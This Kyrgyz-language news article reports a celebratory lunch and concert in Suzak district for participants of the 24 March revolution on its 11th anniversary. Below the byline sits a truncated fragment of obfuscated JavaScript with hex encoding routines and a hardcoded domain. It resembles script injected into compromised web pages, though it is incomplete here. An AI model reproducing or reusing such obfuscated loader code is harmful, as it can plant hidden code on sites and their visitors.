Menu

Сузак районунда 24-март ыңкылабынын 100дөн ашуун катышуучуларына сый тамак тартууланды

Бөлүшүү:

 

Бүгүн, 24-март ыңкылабынын 11 жылдыгына карата  Сузак районундагы анын 100дөн ашуун катышуучуларына Ырыс айыл аймагына караштуу Ай-Бий даамканасында атайын дасторкон жайылып, майрамдык сый тамак тартууланды деп маалымдады өкүлдүн басма сөз катчысы. Майрамдык иш чаранын катышуучуларын сый тамак үстүндө Сузак районунун акими Абдумуктар Маматов, өкүлчүлүктүн социалдык мониторинг жана өнүгүү бөлүмүнүн башкы адиси Абдулла Камбаров жана Сузак районунун Көк-Арт айыл аймагынын башчысы Шералы Кудайбердиев куттукташып, аларга бекем ден соолук жана иштерине ийгилик каалашты.

Өз кезегинде сөзгө чыгышкан Барпы айыл аймагынын тургуну, кадырман аксакал  Аскар Бегматов, Ырыс айыл аймагынын тургуну, эмгек ардагери Кимсанбай Маматов ыңкылаптын катышуучуларын куттукташып, элди ынтымакчылык менен биримдикке чакырып кетишти. Мындан 11 жыл илгери март ыңкылабына активдүү катышкан бир катар аялдар менен энелер мындан ары өлкөбүздө саясий олку-солкулуктар болбосу керектигин билдиришип, мамлекетибиздин эртеңки келечеги элибиздин биримдиги менен ынтымакчылыгында, өлкөдөгү саясий туруктуулукка түздөн-түз көз каранды экендигин өз сөздөрүндө баса белгилеп кетишти.

Март ыңкылабынын катышуучуларына Жалал-Абад областтык Токтосун Тыныбеков атындагы филармониянын артисттери кеңири программадагы концерт тартуулашып, катышуучулардын жарпын жазышты. Өздөрүнө көрүлгөн ушундай көңүл буруу жана камкордукттары үчүн март ыңкылабынын катышуучулары Сузак райондук мамлекеттик администрациясынын аппаратына жана айыл аймактарынын башчыларына чын дилдеринен чыккан терең ыраазычылыктарын билдиришти.

 

  Жолдошбай Осмонов, журналист

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha − 2 = 5

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: